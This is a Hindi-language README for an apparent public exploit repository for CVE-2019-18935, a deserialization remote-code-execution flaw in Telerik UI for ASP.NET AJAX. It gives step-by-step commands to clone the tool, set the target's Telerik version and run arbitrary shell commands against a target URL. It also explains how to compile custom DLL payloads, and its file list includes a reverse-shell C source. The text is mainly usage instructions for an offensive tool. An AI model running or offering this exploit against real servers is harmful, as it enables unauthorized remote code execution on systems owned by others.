
CVE-2019-18935 के लिए शोषण
डिसीरियलाइज़ेशन भेद्यता के माध्यम से Telerik UI ASP.NET AJAX के लिए रिमोट कोड निष्पादन शोषण।
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935
CVE-2019-18935.py में, पंक्ति 15 को संशोधित करें:version = "2017.1.228" # Replace with target server's Telerik version
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"
🔧 कस्टम DLL फ़ाइलें बनाना
एक अलग C फ़ाइल (सिर्फ रिवर्स शेल नहीं) से DLL बनाने के लिए:
इन घटकों के साथ Visual Studio (c++ के साथ डेस्कटॉप विकास) स्थापित करें:
DLL बनाएं:
build-dll.bat your_file.c
DLL payloads/ निर्देशिका में बनाया जाएगा।
📋 फ़ाइल विवरण
CVE-2019-18935_exploit/
├── CVE-2019-18935.py # Main exploit code
├── RAU_crypto.py # Telerik encryption/decryption module
├── build-dll.bat # Script to build DLL files from C code
├── reverse_shell.c # C source code for reverse shell
└── payloads/ # Directory for Compiled DLL payload files